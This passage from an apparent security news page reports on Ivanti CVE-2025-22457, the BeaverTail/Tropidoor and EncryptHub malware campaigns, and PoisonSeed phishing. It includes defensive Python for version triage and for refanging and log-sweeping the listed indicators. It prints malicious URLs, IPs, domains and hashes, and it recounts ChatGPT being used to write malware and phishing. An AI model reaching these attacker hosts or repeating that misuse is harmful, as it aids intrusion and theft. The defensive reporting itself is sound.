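    """True if the appliance runs a build below the fix, or is unsupported PCS."""
    key = product.lower()
    if key == "pcs":
        return True
    if key not in FIXED_IN:
        raise ValueError(f"unknown product: {product!r}")
    return parse_version(version) < FIXED_IN[key]


def triage(inventory: List[Tuple[str, str, str]]) -> List[Tuple[str, str]]:
    """Return (hostname, recommended action) for every appliance that needs one."""
    actions: List[Tuple[str, str]] = []
    for host, product, version in inventory:
        if not needs_action(product, version):
            continue
        if product.lower() == "pcs":
            actions.append((host, "unsupported: contact Ivanti to migrate to a supported platform"))
        else:
            ma, mi, rel, pat = FIXED_IN[product.lower()]
            actions.append((host, f"run ICT, then upgrade to {ma}.{mi}R{rel}.{pat} "
                                  f"(factory reset and redeploy if compromised)"))
    return actions


# Constructed sample inventory: (hostname, product, version). Hostnames are invented.
SAMPLE_INVENTORY = [
    ("vpn-eu-1", "ics", "22.7R2.5"),
    ("vpn-eu-2", "ics", "22.7R2.6"),
    ("vpn-legacy", "pcs", "9.1R18.9"),
    ("nac-1", "ips", "22.7R1.3"),
    ("zta-gw-1", "zta", "22.8R2.2"),
]

if __name__ == "__main__":
    for host, action in triage(SAMPLE_INVENTORY):
        print(f"{host}: {action}")
```

Feed it your own export of appliance names and versions; anything it flags for ICS should be checked with the Integrity Checker Tool before the upgrade, since a clean upgrade does not evict an attacker who is already on the box.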
Detection and Response
Ivanti advises running the Integrity Checker Tool (ICT) and treating its findings, along with anomalies such as web server crashes, as signs of possible compromise. If compromise is detected, a factory reset followed by an upgrade to 22.7R2.6 is recommended. Mandiant's blog offers further indicators of compromise. An X post by @nekono_naha revealed that 66% of 12,471 exposed Ivanti/Pulse Connect Secure servers (8,246) are vulnerable, with about half (6,049) still on pre-9.x versions, emphasizing the need for immediate action.
This marks Ivanti’s 15th entry in CISA’s Known Exploited Vulnerabilities catalog since 2024, highlighting ongoing security issues with its edge devices.
UNC5221’s involvement points to broader geopolitical concerns, as China-linked actors target infrastructure for espionage.
The delayed disclosure despite the February patch reveals vulnerability management gaps. Initially underestimated, the flaw’s exploitability gave attackers a month-long window, underscoring the need for faster threat intelligence sharing.
The active exploitation of CVE-2025-22457 underscores the persistent threats to edge devices.
As groups like UNC5221 exploit such flaws, organizations must prioritize patching and secure configurations.
Ivanti’s response mitigates risks for supported systems, but unsupported platforms remain a challenge, highlighting the need for proactive cybersecurity measures in a rapidly evolving threat landscape.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
A concerning malware campaign was disclosed by the AhnLab Security Intelligence Center (ASEC), revealing how threat actors are leveraging fake recruitment emails to distribute malicious payloads.
The attackers impersonated Dev.to, a prominent developer community, and lured victims with promises of lucrative job offers.
Instead of attaching malware directly to emails, they provided a BitBucket link containing a seemingly legitimate project.
Hidden within the project were two dangerous malware strains: BeaverTail, disguised as “tailwind.config.js,” and a downloader named “car.dll.”
By mimicking trusted platforms and offering job opportunities, attackers bypass traditional security measures and exploit human trust.
Figure: Attack disclosed in the developer community
Malware Analysis: BeaverTail and Tropidoor
The JavaScript-based BeaverTail malware is known for its dual role as an information stealer and downloader.
It targets web browsers to extract credentials, cryptocurrency wallet data, and other sensitive information.
Additionally, it downloads secondary payloads like InvisibleFerret, a backdoor for further exploitation.
BeaverTail’s obfuscation techniques make detection challenging, while its cross-platform compatibility enables it to target Windows, macOS, and Linux systems.
In this specific case, BeaverTail was executed via the downloader “car.dll.”
Logs revealed its use of tools like Curl to download additional files (“p.zip” and “p2.zip”) from attacker-controlled servers.
These behaviors align with previous reports linking BeaverTail to North Korean threat actors.
Tropidoor: A Memory-Resident Backdoor
Tropidoor operates in memory as a sophisticated backdoor. Upon execution, it decrypts itself and connects to multiple command-and-control (C&C) servers.
It collects system information, encrypts it with an RSA public key (encoded in Base64), and transmits it to the C&C server using parameters like “tropi2p” and “gumi.”
The malware can execute various commands, including file manipulation, process termination, data exfiltration, and even injecting downloaded payloads into other processes.
One notable feature of Tropidoor is command #34, which allows attackers to execute basic Windows commands such as “schtasks” and “ping.”
Figure: Windows commands implemented in the code
According to the Report, this technique mirrors behaviors seen in LightlessCan malware associated with the Lazarus Group.
Indicators of Compromise (IoCs)
File Hashes (MD5):
3aed5502118eb9b8c9f8a779d4b09e11
84d25292717671610c936bca7f0626f5
94ef379e332f3a120ab16154a7ee7a00
b29ddcc9affdd56a520f23a61b670134
Malicious URLs:
http[:]//103[.]35[.]190[.]170/Proxy[.]php
https[:]//45[.]8[.]146[.]93/proxy/Proxy[.]php
IP Addresses:
135[.]181[.]242[.]24
191[.]96[.]31[.]38
These IoCs underline the global reach of this campaign and its association with North Korean cyber operations.
This attack is part of a broader trend where North Korean threat actors target individuals through phishing campaigns disguised as job recruitment efforts.
By exploiting platforms like LinkedIn or developer communities such as Dev.to, they aim to infiltrate not just individuals but also their organizations.
The financial motives are evident in their focus on cryptocurrency wallets and browser-stored credentials.
To mitigate such threats:
Avoid opening unsolicited emails or clicking on links from unknown sources.
Verify the authenticity of recruitment offers directly with the organization.
Keep antivirus software updated to detect evolving threats like BeaverTail.
Monitor network traffic for suspicious connections to known malicious IPs.
As attackers continue refining their methods, vigilance remains critical for both individuals and organizations alike.
EncryptHub, a rapidly evolving cybercriminal entity, has come under intense scrutiny following revelations of operational security (OPSEC) failures and extensive reliance on ChatGPT for its operations.
This emerging threat actor has been linked to ransomware campaigns, data theft, and the development of advanced malware tools, including EncryptRAT.
However, critical mistakes in their operational infrastructure have exposed their activities, providing cybersecurity researchers with unprecedented insights into their tactics, techniques, and procedures (TTPs).
Key mistakes included enabling directory listings on core servers, exposing sensitive malware configuration files, and reusing passwords across multiple accounts.
These lapses allowed researchers to uncover vital details about their infrastructure and campaigns.
For instance, Telegram bot configurations used for data exfiltration were left accessible, and backup codes for two-factor authentication (2FA) were stored in plaintext files that were later exfiltrated by their own malware.
Additionally, EncryptHub mixed personal and criminal activities by using the same systems for both.
According to Outpost24, this included logging into personal accounts while testing malware and reusing domains from legitimate jobs for malicious purposes.
Such errors provided investigators with a clearer picture of the actor’s identity and operations.
A surprising revelation in the investigation was EncryptHub’s extensive use of ChatGPT as a development assistant.
The AI chatbot was employed to create malware components, configure command-and-control (C2) servers, and even draft phishing emails and underground forum posts.
EncryptHub also relied on ChatGPT for vulnerability research and code optimization, integrating these findings into their campaigns.
Figure: ChatGPT’s final conclusion
In one notable instance, the actor used ChatGPT to draft posts selling exploits for vulnerabilities they had previously reported under an alias to Microsoft’s Security Response Center (MSRC).
This dual role as both a white-hat researcher and black-hat hacker underscores the complexity of EncryptHub’s operations.
Attack Chain and Indicators of Compromise (IOCs)
According to the Report, EncryptHub’s multi-stage attack chain begins with trojanized applications disguised as legitimate software like WeChat, Google Meet, and Microsoft Visual Studio 2022.
These applications deploy PowerShell scripts to steal credentials from messaging apps, cryptocurrency wallets, and password managers.
Subsequent stages involve deploying additional payloads such as Rhadamanthys stealer or ransomware.
Key IOCs linked to EncryptHub include:
Malware Hashes: Examples include 6f346b7dffc0c3872923dd0c3b2ddb7966a10961 (crypto.ps1) and cb41b440148b2d24d4877ab09514aa23a4253a17 (ram.ps1).
Domains: Notable domains used include 0xffsec[.]net and vexio[.]io.
IPs: Critical IPs include 206.166.251.99 and 82.115.223.231.
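Both this IoC list and the BeaverTail/Tropidoor list earlier on the page are printed defanged ([.] and [:]), so they cannot be pasted straight into a search. The script below is an added example written for this page, not code from ASEC, Outpost24 or either malware family: it refangs the indicators from both lists, indexes the host of each listed URL as an IP or domain indicator as well (a generalisation beyond the lists as printed), and sweeps them across a few constructed log lines. The log lines, hostnames and internal addresses are invented for the example; the two 40-hex-digit EncryptHub hashes are SHA-1 length, an algorithm the article does not name.

```python
import re
from typing import Dict, List, Set, Tuple
from urllib.parse import urlparse

IPV4 = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
HEXHASH = re.compile(r"(?<![0-9a-f])(?:[0-9a-f]{40}|[0-9a-f]{32})(?![0-9a-f])")


def refang(ioc: str) -> str:
    """Undo the defanging used in the write-ups: [.] -> ., [:] -> :, hxxp -> http."""
    s = ioc.strip().replace("[.]", ".").replace("[:]", ":")
    return re.sub(r"^hxxp", "http", s, flags=re.IGNORECASE)


# Indicators copied from the two IoC lists on this page, defanged exactly as printed.
RAW_IOCS: Dict[str, List[str]] = {
    "hash": [
        "3aed5502118eb9b8c9f8a779d4b09e11", "84d25292717671610c936bca7f0626f5",
        "94ef379e332f3a120ab16154a7ee7a00", "b29ddcc9affdd56a520f23a61b670134",
        "6f346b7dffc0c3872923dd0c3b2ddb7966a10961", "cb41b440148b2d24d4877ab09514aa23a4253a17",
    ],
    "url": ["http[:]//103[.]35[.]190[.]170/Proxy[.]php", "https[:]//45[.]8[.]146[.]93/proxy/Proxy[.]php"],
    "ip": ["135[.]181[.]242[.]24", "191[.]96[.]31[.]38", "206.166.251.99", "82.115.223.231"],
    "domain": ["0xffsec[.]net", "vexio[.]io"],
}


def build_indicators(raw: Dict[str, List[str]]) -> Dict[str, Set[str]]:
    """Refang and lower-case every indicator. The host of each URL is also indexed
    as an IP or domain so a bare connection to it is caught when only the
    destination, not the full URL, was logged."""
    ind: Dict[str, Set[str]] = {k: set() for k in ("hash", "url", "ip", "domain")}
    ind["hash"].update(h.lower() for h in raw.get("hash", []))
    for u in raw.get("url", []):
        u = refang(u)
        ind["url"].add(u.lower())
        host = (urlparse(u).hostname or "").lower()
        if host:
            ind["ip" if IPV4.fullmatch(host) else "domain"].add(host)
    ind["ip"].update(refang(ip) for ip in raw.get("ip", []))
    ind["domain"].update(refang(d).lower() for d in raw.get("domain", []))
    return ind


def scan_line(line: str, ind: Dict[str, Set[str]]) -> List[Tuple[str, str]]:
    """Return (indicator_type, value) for every indicator present in one log line."""
    low = line.lower()
    hits: List[Tuple[str, str]] = []
    hits += [("hash", h) for h in sorted(set(HEXHASH.findall(low)) & ind["hash"])]
    hits += [("ip", ip) for ip in sorted(set(IPV4.findall(line)) & ind["ip"])]
    # Domains match as whole labels: sub.vexio.io matches, notvexio.io does not.
    hits += [("domain", d) for d in sorted(ind["domain"])
             if re.search(r"(?<![\w-])" + re.escape(d) + r"(?![\w-])", low)]
    hits += [("url", u) for u in sorted(ind["url"]) if u in low]
    return hits


def scan_logs(lines: List[str], ind: Dict[str, Set[str]]) -> List[Tuple[int, str, str]]:
    """Sweep every line; returns (line_index, indicator_type, value) triples."""
    return [(i, t, v) for i, line in enumerate(lines) for t, v in scan_line(line, ind)]


# Constructed sample log lines (not real telemetry); hosts and internal IPs are invented.
SAMPLE_LOGS = [
    '2025-04-04T10:12:03Z proxy src=10.0.0.23 dst=45.8.146.93 url="https://45.8.146.93/proxy/Proxy.php"',
    r'2025-04-04T10:13:44Z edr host=dev-ws-07 file=C:\Users\dev\project\tailwind.config.js md5=3aed5502118eb9b8c9f8a779d4b09e11',
    '2025-04-04T10:15:00Z dns qname=vexio.io rcode=NOERROR',
    '2025-04-04T10:16:10Z proxy src=10.0.0.31 dst=142.250.74.46 url="https://www.example.com/"',
    r'2025-04-04T10:17:55Z edr host=fin-ws-02 file=C:\Temp\ram.ps1 sha1=CB41B440148B2D24D4877AB09514AA23A4253A17',
]

if __name__ == "__main__":
    for lineno, kind, value in scan_logs(SAMPLE_LOGS, build_indicators(RAW_IOCS)):
        print(f"line {lineno}: {kind} {value}")
```

Hash matching is case-insensitive because EDR products disagree on hex case, and the hash regex is anchored on non-hex boundaries so a 32-digit prefix of a SHA-1 is not mistaken for an MD5. Swap SAMPLE_LOGS for a real proxy, DNS or EDR export to run the sweep.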
Despite their mistakes, EncryptHub remains a formidable threat due to their adaptability and technical expertise.
Their ongoing development of tools like EncryptRAT suggests potential commercialization of their malware arsenal.
Organizations are urged to strengthen endpoint defenses, monitor for IOCs, and implement robust multi-layered security strategies to mitigate risks posed by such actors.
EncryptHub’s case highlights the dual-edged nature of advanced technologies like AI in cybersecurity, capable of both empowering defenders and enabling attackers.
As this threat actor continues to evolve, so too must the vigilance of the cybersecurity community.
A sophisticated phishing campaign, dubbed “PoisonSeed,” has been identified targeting customer relationship management (CRM) and bulk email providers to facilitate cryptocurrency-related scams.
The threat actors behind this campaign are leveraging compromised credentials to export email lists and send bulk phishing emails, aiming to compromise cryptocurrency wallets through a novel seed phrase poisoning technique.
Figure: Screenshot of the phishing email sent to Troy Hunt
Phishing Tactics and Infrastructure Exploitation
PoisonSeed’s operations involve setting up phishing pages that closely mimic login portals of prominent CRM and bulk email platforms, including Mailchimp, SendGrid, HubSpot, and Zoho.
These fake login pages are used to steal credentials from targeted users.
Once access is gained, the attackers automate the export of email lists and maintain persistence by creating new API keys, even if passwords are reset.
The compromised accounts are then used to send phishing emails at scale.
One notable incident involved the compromise of Akamai’s SendGrid account in March 2025.
Figure: Email headers for the Coinbase phishing effort sent from Akamai
Attackers sent phishing emails masquerading as Coinbase communications, urging recipients to migrate to self-custodial wallets.
Victims were provided with fraudulent seed phrases intended for use in wallet creation.
By later recovering these wallets using the same seed phrases, attackers could access and steal funds.
Cryptocurrency Seed Phrase Poisoning
The core of PoisonSeed’s strategy lies in its seed phrase poisoning attack.
Victims are tricked into entering attacker-provided seed phrases while setting up new cryptocurrency wallets.
This allows the attackers to monitor and eventually take control of these wallets once funds are deposited.
This method represents a shift from traditional phishing tactics, as it delays the theft until victims unknowingly use the compromised seed phrases.
The PoisonSeed campaign shares certain infrastructural similarities with CryptoChameleon, a threat group known for targeting high-net-worth cryptocurrency holders through spear-phishing and SIM-swapping attacks.
Both groups have targeted platforms like Coinbase and Ledger in the past.
However, PoisonSeed’s tactics such as targeting CRM platforms and delaying cash-out efforts differ significantly from CryptoChameleon’s rapid exploitation methods.
While some researchers have attempted to link PoisonSeed to Scattered Spider, another threat group associated with The Comm (a community of Western cybercriminals), Silent Push analysts argue against this attribution.
Scattered Spider primarily focuses on large-scale ransomware attacks against corporate targets and has not been observed engaging in cryptocurrency wallet phishing.
Silent Push researchers have identified over 49 domains linked to PoisonSeed through WHOIS analysis and phishing kit fingerprints.
These domains often feature obscene or generic placeholders in their registration details, such as “asdf” or “123123,” which help track the campaign’s infrastructure.
To mitigate risks posed by PoisonSeed, organizations are advised to monitor indicators of compromise (IOCs) related to these domains and implement robust email security measures.
Silent Push offers enterprise-level feeds for tracking PoisonSeed-related domains and IPs to enhance detection capabilities.
The PoisonSeed campaign highlights an alarming evolution in phishing tactics, blending supply chain compromises with cryptocurrency-targeted schemes.
While its ties to CryptoChameleon remain speculative, its distinct methodologies warrant classification as an independent threat actor group.
Organizations must remain vigilant against such advanced threats that exploit trust in widely used CRM platforms for malicious purposes.